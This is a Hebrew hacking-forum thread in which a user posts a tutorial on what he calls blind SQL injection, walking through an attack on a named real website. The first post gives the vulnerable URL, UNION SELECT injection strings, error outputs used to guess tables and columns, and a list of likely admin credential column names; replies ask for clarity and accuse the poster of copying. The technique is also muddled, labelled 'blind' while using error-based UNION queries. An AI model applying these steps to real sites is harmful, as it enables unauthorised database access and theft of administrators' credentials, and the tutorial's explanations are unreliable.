קהילות פורומים, הורדות, יעוץ ותמיכה


אשכולות דומים

  1. [פרסום] מדריך Sql Blind+הדגמא על אתר
    על ידי roee147 בפורום האקינג ואבטחת מידע
    תגובות: 10
    הודעה אחרונה: 01-09-2010, 17:17
  2. [מדריך] איך לגלות אייפי של אתר מסויים
    על ידי .Eliran. בפורום מדריכים וטיפים
    תגובות: 6
    הודעה אחרונה: 05-07-2008, 10:02
  3. [מדריך]המרה והורדת שירים- באמצעות אתר מ"עולם אחר"!!!
    על ידי APOLO 555 בפורום ארכיון מדריכים
    תגובות: 25
    הודעה אחרונה: 03-04-2008, 19:44
  4. מדריך| לראות איך נראה פעם אתר מסויים
    על ידי GspeR בפורום ארכיון מדריכים
    תגובות: 3
    הודעה אחרונה: 29-11-2007, 01:17
  5. מדריך|מספרי אייסיקיו קצרים חינם! אתר פועל
    על ידי Adidas בפורום ארכיון מדריכים
    תגובות: 163
    הודעה אחרונה: 16-09-2007, 08:35
+ תגובה לנושא
מציג תוצאות 1 עד 6 מתוך 6

מדריך Sql Blind+הדגמא על אתר

  1. #1
    משתמש מתחיל
    תאריך הצטרפות
    11/2010
    הודעות
    59
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל מדריך Sql Blind+הדגמא על אתר

    שלום לכולם היום נילמד שיטת הזרקה חדשה מפעם שעברה לשיטה קוראים.: sql blind
    קודם כל מזה sql blind???
    sql blind זה זריקה עיוורת היא שונה מי sql injection זריקה עיוורת שהמערכת לא תדע שאנחנו מזריקים
    טוב עכשיו שאחנו יודעים מזה sql blind נילמד איך מזריקים..
    אוקי כמו שאמרתי המדריך הוא רק לאבטחת מידע נזק לא על אחריותי!!
    כמו במדריך הקודם אנחנו נזריק על האתר www.evt-me.com
    שלבים:
    שלב א.
    מציאת דף פריץ באתר ראו דף פריץ:
    http://www.evt-me.com/newsDetail.php?id=-8
    שלב ב.
    אחרי שמצאנו דף פריץ אנחנו נזריק הזרקה עיוורת.. על ידי הפקודה +union+select+0+from+user
    פקודה זאת אומרת האים הטבלה user קיימת זה אמור להיראות כך:
    http://www.evt-me.com/newsDetail.php...ct+0+from+user
    וכמו שאתם רואים זה מחזיר שגיאה:
    Table 'evt_evt.user' doesn't existזה אומר שהטבלה לא קיימת אז מה עושים ממשיכים לנחש שמות טבלאות- נגיד עכשיו ננסה ליבדוק אים הטבלה login קיימת בוא ניבדוק את זה.. פשוט משנים בפקודה בימקום user ל login ואז ניראה מזה אומר:
    The used SELECT statements have a different number of columns
    כמו שזה ניראה זה אומר שהטבלה קיימת אים מישהו לא הבין איך זה אמור להיראות אז ככה:
    http://www.evt-me.com/newsDetail.php...t+0+from+login
    עכשיו מה שאנחנו צריכים לעשות כמו בunion אנחנו צריכים לדעת באיזה מיספר אנחנו נזריק שיאלתות שיתנו לנו תיוזר ותסיסמה פשוט ממשיכים מה 0 עד למתי שזה מראה תמיספר..
    אני הגעתי עד ל6 אים לא הבנתם ראו דוגמא:
    http://www.evt-me.com/newsDetail.php...5,6+from+login
    ומה זה הראה לנו??? את המיספר 1 ובוא נזריק תשיאלתות.. עכשיו אנחנו ננחש תעמודות...
    בדרך כלל העמודות של הטבלה של האדמין הם כאלה:
    admin_name
    pass
    password
    admin_pass
    admin_password
    user
    user_name
    user_password
    username
    עכשיו ננסה לנחש תעמודות.. אני מצאתי שיש תעמודה username:
    http://www.evt-me.com/newsDetail.php...5,6+from+login
    ויש תעמודה pass:
    http://www.evt-me.com/newsDetail.php...5,6+from+login
    עכשיו למדתם איך להזריק זריקה עיוורת..-sql blind
    אני מקווה שלמדתם משהו היום..
    קרדיט ל...לי^^

  2. קישורים ממומנים

  3. #2
    מורחקים
    שם פרטי
    יוני
    תאריך הצטרפות
    01/2011
    גיל
    30
    הודעות
    1,674
    לייקים
    6
    נקודות
    841
    מין: זכר

    ברירת מחדל

    אחי זה לא מובן.
    איך מזריקים את הפקודה "+union+select+0+from+user"?
    איך מוצאים את הדף הפריץ?

  4. #3
    משתמש מתקדם
    שם פרטי
    ספיר
    תאריך הצטרפות
    03/2011
    גיל
    30
    הודעות
    532
    לייקים
    26
    נקודות
    -30
    משפט מחץ
    יש שני דברים אינסופים: היקום ואיבר המין שלי אבל אני לא בטוח לגבי הראשון XD
    מין: זכר

    ברירת מחדל

    אחי תפרט קצת יותר אני יודע את זה הנושא אבל בבקשה אם אתה עושה מדריך תשקיע עוד טיפה...
    נערך לאחרונה על ידי sapirshemer; 23-05-2011 בשעה 16:21.
    "the quieter you become, the more you are able to hear"
    פעיל בפורום:
    ~פיקאפ ואומנות הפיתוי~
    תחומים:
    מתמחה בשיטה של מיסטרי, בשיטה הטבעית של גמבלר, שפת גוף, בעל ידע בסיסי בNLP וניסיון בשטח.
    כל שאלה תתקבל בברכה

  5. #4
    משתמש מתקדם האוואטר של Zer0Day
    תאריך הצטרפות
    01/2011
    גיל
    35
    הודעות
    827
    לייקים
    6
    נקודות
    98
    מין: זכר

    ברירת מחדל

    זה במסד נתונים גרסא 4 ..



  6. #5
    משתמש מתקדם
    שם פרטי
    אריאל
    תאריך הצטרפות
    08/2010
    הודעות
    829
    לייקים
    65
    נקודות
    49
    משפט מחץ
    (-:
    מין: זכר

    ברירת מחדל

    מעתיקןןןןןןןןןןןןןןןןןן

    http://www.iatraf.co.il/showthread.p...90%D7%AA%D7%A8


  7. #6
    משתמש מתחיל
    תאריך הצטרפות
    11/2010
    הודעות
    59
    לייקים
    0
    נקודות
    0
    מין: זכר

    ברירת מחדל

    לא העתקתי אני זה ROEE147

+ תגובה לנושא


הרשאות פרסום

  • אין באפשרותך לפרסם נושאים חדשים
  • אין באפשרותך לפרסם תגובות
  • אין באפשרותך לצרף קבצים
  • אין באפשרותך לערוך את הודעותיך


כל הזמנים הם לפי GMT +3. השעה כרגע היא 20:33.
מופעל על ידי vBulletin™ © גרסה 4.1, 2011 vBulletin Solutions, Inc. כל הזכויות שמורות.
פעילות הגולשים
אומנות וגרפיקה
מוזיקה
ספורט
סדרות טלוויזיה
סרטים וקולנוע
קנייה ומכירה
רשתות חברתיות
הבורר 3
פורומי פנאי ובידור
סרטים
סדרות
משחקים
דיבורים
אקטואליה
בעלי חיים
בדיחות והומור
משחקי ספורט
הבורר
מחשבים וטכנולוגיה
תמיכה טכנית
חומרה ומודינג
תוכנות להורדה
סלולארי וגאדג'טים
רקעים למחשב
ציוד הקפי למחשב
אבטחת מידע
תכנות ובניית אתרים
כסף ברשת
אייפון
בריאות ואורח חיים
כושר ופיתוח גוף
דיאטה
צבא וגיוס
יעוץ מיני
מה שבלב
אומנות הפיתוי
יהדות
מיסטיקה ורוחניות
אתאיזם ודתות

נושאים: 2,473,169 | הודעות: 8,173,756 | משתמשים: 315,603 | המשתמש החדש ביותר: upizijoj | עיצוב גרפי: סטודיו עודד בביוף | קידוד: rellect